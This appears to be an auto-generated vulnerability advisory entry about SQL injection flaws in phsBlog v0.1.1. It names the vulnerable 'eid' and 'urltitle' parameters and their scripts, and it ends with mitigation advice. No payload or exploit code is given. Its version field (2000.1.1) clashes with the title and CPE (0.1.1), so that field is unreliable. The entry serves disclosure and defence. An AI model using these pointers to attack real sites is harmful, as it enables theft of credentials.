vendor:
phsBlog
by:
cOndemned
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phsBlog
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:phsblog:phsblog:0.1.1
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities
Multiple Remote SQL Injection Vulnerabilities exist in phsBlog v0.1.1. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The vulnerabilities exist due to insufficient sanitization of user-supplied input in the 'eid' and 'urltitle' parameters of the 'comments.php' and 'entries.php' scripts respectively. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable scripts. Successful exploitation of these vulnerabilities can result in unauthorized access to sensitive information.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be kept up-to-date with the latest security patches.
